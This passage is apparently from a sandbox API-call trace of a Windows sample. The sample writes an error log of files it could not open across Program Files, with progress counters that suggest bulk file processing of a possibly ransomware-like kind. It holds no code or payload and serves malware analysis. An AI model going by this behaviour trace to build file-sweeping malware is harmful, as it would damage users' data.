denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=5257, lpMultiByteStr=0x248b658, cbMultiByte=5257, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\n!Ï5Ë*»ýwkd@l<´/Ñù¼ås÷N÷HÃÝ6c\x0cH9en )Æîæß½÷®ÀcëR+", lpUsedDefaultChar=0x0) returned 5257 [0219.860] WriteFile (in: hFile=0x28c, lpBuffer=0x248b658*, nNumberOfBytesToWrite=0x1489, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x248b658*, lpNumberOfBytesWritten=0x63fe20*=0x1489, lpOverlapped=0x0) returned 1 [0219.861] CloseHandle (hObject=0x28c) returned 1 [0219.862] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=305 / B=2 / T=2891", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0219.862] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=305 / B=2 / T=2891", cchWideChar=38, lpMultiByteStr=0x1fe554c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=305 / B=2 / T=2891", lpUsedDefaultChar=0x0) returned 38 [0219.862] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x26, lpOverlapped=0x0) returned 1 [0219.953] Sleep (dwMilliseconds=0x5dc) [0221.467] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0221.973] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=6521, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6521 [0221.973] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=6521, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6521 [0221.973] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=6521, lpMultiByteStr=0x1ed6ca8, cbMultiByte=6521, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". 